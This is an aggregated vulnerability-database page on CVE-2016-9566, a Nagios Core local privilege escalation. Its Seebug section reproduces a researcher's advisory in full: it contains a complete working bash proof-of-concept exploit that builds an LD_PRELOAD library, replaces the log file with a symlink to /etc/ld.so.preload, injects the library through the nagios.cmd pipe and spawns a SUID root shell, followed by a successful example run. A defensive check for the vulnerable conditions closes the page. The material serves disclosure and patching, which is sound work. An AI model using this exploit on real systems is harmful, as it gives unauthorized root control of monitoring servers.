    reporterThis script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/103651
    titleAmazon Linux AMI : nagios (ALAS-2017-899)

Packetstorm

data source: https://packetstormsecurity.com/files/download/140169/nagioscore-exec.txt
id: PACKETSTORM:140169
last seen: 2016-12-15
published: 2016-12-15
reporter: Dawid Golunski
source: https://packetstormsecurity.com/files/140169/Nagios-Core-Curl-Command-Injection-Code-Execution.html
title: Nagios Core Curl Command Injection / Code Execution

Redhat

advisories
  • rhsa
    id: RHSA-2017:0211
  • rhsa
    id: RHSA-2017:0212
  • rhsa
    id: RHSA-2017:0213
  • rhsa
    id: RHSA-2017:0214
  • rhsa
    id: RHSA-2017:0258
  • rhsa
    id: RHSA-2017:0259
rpms
  • nagios-0:3.5.1-9.el7
  • nagios-common-0:3.5.1-9.el7
  • nagios-debuginfo-0:3.5.1-9.el7
  • nagios-devel-0:3.5.1-9.el7
  • nagios-0:3.5.1-9.el6
  • nagios-common-0:3.5.1-9.el6
  • nagios-debuginfo-0:3.5.1-9.el6
  • nagios-devel-0:3.5.1-9.el6

Seebug

bulletinFamily: exploit
description:

INTRODUCTION
-------------------------

Nagios Core daemon in versions below 4.2.4 was found to perform unsafe operations when handling the log file. This could be exploited by malicious local attackers to escalate their privileges from 'nagios' system user, or from a user belonging to 'nagios' group, to root. The exploit could enable the attackers to fully compromise the system on which a vulnerable Nagios version was installed.

To obtain the necessary level of access, the attackers could use another Nagios vulnerability discovered by the author of this advisory - CVE-2016-9565 which has been linked in the references.

DESCRIPTION
-------------------------

Default installation of Nagios Core creates the log directory with the following permissions:

```
drwxrwsr-x 5 nagios nagios
```

Nagios daemon was found to open the log file before dropping its root privileges on startup:

```
8148 open("/usr/local/nagios/var/nagios.log", O_RDWR|O_CREAT|O_APPEND, 0666) = 4
8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0
8148 fchown(4, 1001, 1001) = 0
8148 getegid() = 0
8148 setgid(1001) = 0
8148 geteuid() = 0
[...]
```

If an attacker managed to gain access to an account of 'nagios' or any other account belonging to the 'nagios' group, they would be able to replace the log file with a symlink to an arbitrary file on the system.

This vulnerability could be used by an attacker to escalate their privileges from nagios user/group to root for example by creating a malicious /etc/ld.so.preload file. The file would be created with the following nagios permissions due to the fchown operation shown above:

```
-rw-r--r-- 1 nagios nagios 950 Dec 10 11:56 /etc/ld.so.preload
```

which would enable write access to the file for the 'nagios' user but not the 'nagios' group.

#### Gaining write access to ld.so.preload as 'nagios' group

If the attacker managed to exploit the CVE-2016-9565 vulnerability explained at:

https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

they would gain access to www-data account belonging to 'nagios' group in case of a default Nagios install following the official Nagios setup guide:

https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf

This would not be enough to write to ld.so.preload file as 'nagios' group is only allowed to read the log file. Attackers with access to 'nagios' group could however bypass the lack of write privilege by writing to Nagios external command pipe (nagios.cmd) which is writable by 'nagios' group by default:

```
prw-rw---- 1 nagios nagios 0 Dec 10 19:39 nagios.cmd
```

The Nagios command pipe allows to communicate with Nagios daemon. By sending an invalid command to the pipe, the attacker could bypass the lack of write permission and inject data to the log file (pointing to ld.so.preload). For example, by running the command:

```
/usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so \n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd
```

Nagios daemon would append the following line to the log file:

```
[1481439996] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so
```

which would be enough to load a malicious library and escalate the privileges from a www-data user (belonging to 'nagios' group) to root upon a Nagios restart.

#### Forcing restart of Nagios daemon

Attackers could speed up the restart by using the Nagios command pipe once again to send a SHUTDOWN_PROGRAM command as follows:

```
/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd
```

V. PROOF OF CONCEPT EXPLOIT
-------------------------

-----------[ nagios-root-privesc.sh ]--------------

```
#!/bin/bash
#
# Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit
# nagios-root-privesc.sh (ver. 1.0)
#
# CVE-2016-9566
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory
#
#
# [Info]
#
# This PoC exploit allows privilege escalation from 'nagios' system account,
# or an account belonging to 'nagios' group, to root (root shell).
# Attackers could obtain such an account via exploiting another vulnerability,
# e.g. CVE-2016-9565 linked below.
#
# [Exploit usage]
#
# ./nagios-root-privesc.sh path_to_nagios.log
#
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
#
# Video PoC:
# https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
#
# CVE-2016-9565:
# https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html
#
# Disclaimer:
# For testing purposes only. Do no harm.
#

BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/nagiosrootsh"
PRIVESCLIB="/tmp/nagios_privesc_lib.so"
PRIVESCSRC="/tmp/nagios_privesc_lib.c"
SUIDBIN="/usr/bin/sudo"
commandfile='/usr/local/nagios/var/rw/nagios.cmd'

function cleanexit {
	# Cleanup
	echo -e "\n[+] Cleaning up..."
	rm -f $PRIVESCSRC
	rm -f $PRIVESCLIB
	rm -f $ERRORLOG
	touch $ERRORLOG
	if [ -f /etc/ld.so.preload ]; then
		echo -n > /etc/ld.so.preload
	fi
	echo -e "\n[+] Job done. Exiting with code $1 \n"
	exit $1
}

function ctrl_c() {
	echo -e "\n[+] Ctrl+C pressed"
	cleanexit 0
}

#intro
echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m"

# Priv check
echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"
id | grep -q nagios
if [ $? -ne 0 ]; then
	echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n"
	exit 3
fi

# Set target paths
ERRORLOG="$1"
if [ ! -f "$ERRORLOG" ]; then
	echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n"
	echo -e "./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log\n"
	exit 3
fi

# [ Exploitation ]
trap ctrl_c INT

# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
	static uid_t (*old_geteuid)();
	old_geteuid = dlsym(RTLD_NEXT, "geteuid");
	if ( old_geteuid() == 0 ) {
		chown("$BACKDOORPATH", 0, 0);
		chmod("$BACKDOORPATH", 04777);
		unlink("/etc/ld.so.preload");
	}
	return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
	echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
	cleanexit 2;
fi

# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check
if [ -f /etc/ld.so.preload ]; then
	echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
	exit 2
fi

# Symlink the Nagios log file
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
	echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
	cleanexit 3
fi
echo -e "\n[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"

{
# Wait for Nagios to get restarted
echo -ne "\n[+] Waiting for Nagios service to get restarted...\n"
echo -n "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] "
read THE_ANSWER
if [ "$THE_ANSWER" = "y" ]; then
	/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > $commandfile
fi
sleep 3s
ps aux | grep -v grep | grep -i 'bin/nagios'
if [ $? -ne 0 ]; then
	echo -ne "\n[+] Nagios stopped. Shouldn't take long now... ;)\n"
fi
while :; do
	sleep 1 2>/dev/null
	if [ -f /etc/ld.so.preload ]; then
		rm -f $ERRORLOG
		break;
	fi
done
echo -e "\n[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: \n`ls -l /etc/ld.so.preload`"

# /etc/ld.so.preload should be owned by nagios:nagios at this point with perms:
# -rw-r--r-- 1 nagios nagios
# Only 'nagios' user can write to it, but 'nagios' group can not.
# This is not ideal as in scenarios like CVE-2016-9565 we might be running as www-data:nagios user.
# We can bypass the lack of write perm on /etc/ld.so.preload by writing to Nagios external command file/pipe
# nagios.cmd, which is writable by 'nagios' group. We can use it to send a bogus command which will
# inject the path to our privesc library into the nagios.log file (i.e. the ld.so.preload file :)

sleep 3s # Wait for Nagios to create the nagios.cmd pipe
if [ ! -p $commandfile ]; then
	echo -e "\n[!] Nagios command pipe $commandfile does not exist!"
	exit 2
fi
echo -e "\n[+] Injecting $PRIVESCLIB via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload"
now=`date +%s`
/usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; $PRIVESCLIB \n" $now > $commandfile
sleep 1s
grep -q "$PRIVESCLIB" /etc/ld.so.preload
if [ $? -eq 0 ]; then
	echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload | grep "$PRIVESCLIB"`"
else
	echo -e "\n[!] Unable to inject the lib to /etc/ld.so.preload"
	exit 2
fi
} 2>/dev/null

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Triggering privesc code from $PRIVESCLIB by executing $SUIDBIN SUID binary"
sudo 2>/dev/null >/dev/null

# Check for the rootshell
ls -l $BACKDOORPATH | grep rws | grep -q root 2>/dev/null
if [ $? -eq 0 ]; then
	echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
	echo -e "\n\033[94mGot root via Nagios!\033[0m"
else
	echo -e "\n[!] Failed to get root: \n`ls -l $BACKDOORPATH`"
	cleanexit 2
fi

# Use the rootshell to perform cleanup that requires root privileges
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
rm -f $ERRORLOG
echo > $ERRORLOG

# Execute the rootshell
echo -e "\n[+] Nagios pwned. Spawning the rootshell $BACKDOORPATH now\n"
$BACKDOORPATH -p -i

# Job done.
cleanexit 0
```

#### Example run

```
www-data@debjessie:/tmp$ ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log
./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log

Nagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566)
nagios-root-privesc.sh (ver. 1.0)
Discovered and coded by:

Dawid Golunski
https://legalhackers.com

[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

[+] Compiling the privesc shared library (/tmp/nagios_privesc_lib.c)

[+] Backdoor/low-priv shell installed at:
-rwxrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh

[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at:
lrwxrwxrwx 1 www-data nagios 18 Dec 11 08:44 /usr/local/nagios/var/nagios.log -> /etc/ld.so.preload

[+] Waiting for Nagios service to get restarted...
Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] y

[+] Nagios stopped. Shouldn't take long now... ;)

[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges:
-rw-r--r-- 1 nagios nagios 871 Dec 11 08:44 /etc/ld.so.preload

[+] Injecting /tmp/nagios_privesc_lib.so via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload

[+] The /etc/ld.so.preload file now contains:
[1481463869] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so

[+] Triggering privesc code from /tmp/nagios_privesc_lib.so by executing /usr/bin/sudo SUID binary

[+] Rootshell got assigned root SUID perms at:
-rwsrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh

Got root via Nagios!

[+] Nagios pwned. Spawning the rootshell /tmp/nagiosrootsh now

nagiosrootsh-4.3# exit
exit

[+] Cleaning up...

[+] Job done. Exiting with code 0
```

#### Video PoC:

https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html

BUSINESS IMPACT
-------------------------

An attacker who has managed to gain access to the 'nagios' account, or an account belonging to the 'nagios' group (which is the case in the CVE-2016-9565 scenario), could escalate their privileges to root and fully compromise the Nagios monitoring server.

id: SSV:92575
last seen: 2017-11-19
modified: 2016-12-16
published: 2016-12-16
reporter: Root
source: https://www.seebug.org/vuldb/ssvid-92575
title: Nagios Core < 4.2.4 - Root Privilege Escalation (CVE-2016-9566)
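The advisory above chains three conditions: a log directory the whole 'nagios' group can write to, a log path replaced by a symlink, and an /etc/ld.so.preload that ends up naming a library outside root's control. The following POSIX shell check is an added defender-side example (not part of Golunski's advisory or of Nagios) that flags each of those conditions on a host; the log and preload paths are parameters so it can be run against a scratch directory, and it assumes GNU coreutils `stat`.

```shell
#!/bin/sh
# Hardening check for the CVE-2016-9566 conditions (added example, not part of
# the advisory or of Nagios). Paths are parameters so it can be pointed at a
# scratch directory; requires GNU coreutils stat.

# Return 0 when $1 is writable by its group or by others (mode & 022 != 0).
is_shared_writable() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    [ $(( 0$mode & 022 )) -ne 0 ]
}

# Check a Nagios log file ($1) and an ld.so.preload path ($2, default
# /etc/ld.so.preload). Prints one line per finding; the return value is the
# number of findings, so 0 means none of the checked conditions is present.
check_nagios_log_paths() {
    log=$1
    preload=${2:-/etc/ld.so.preload}
    logdir=$(dirname "$log")
    findings=0

    # First precondition from the advisory: the log path is already a symlink.
    if [ -L "$log" ]; then
        echo "FINDING: $log is a symlink -> $(readlink "$log")"
        findings=$((findings + 1))
    fi
    # Second: a log directory the whole 'nagios' group can write to (the
    # advisory shows drwxrwsr-x), which lets any member replace the log file.
    if is_shared_writable "$logdir"; then
        echo "FINDING: $logdir is group/world writable; group members can replace $log"
        findings=$((findings + 1))
    fi
    # Outcome: an ld.so.preload that root did not create, or one naming
    # libraries root does not own. The loader treats the file as a
    # whitespace-separated list, so every token is checked as a library path.
    if [ -e "$preload" ]; then
        if [ "$(stat -c '%u' "$preload")" != 0 ]; then
            echo "FINDING: $preload is not owned by root"
            findings=$((findings + 1))
        fi
        while IFS= read -r line || [ -n "$line" ]; do
            for lib in $line; do
                if [ ! -e "$lib" ] || [ "$(stat -c '%u' "$lib")" != 0 ]; then
                    echo "FINDING: $preload names a missing or non-root-owned library: $lib"
                    findings=$((findings + 1))
                fi
            done
        done < "$preload"
    fi
    return $findings
}
```

Run it as `check_nagios_log_paths /usr/local/nagios/var/nagios.log` on a host; a non-zero exit status means at least one of the advisory's conditions is present.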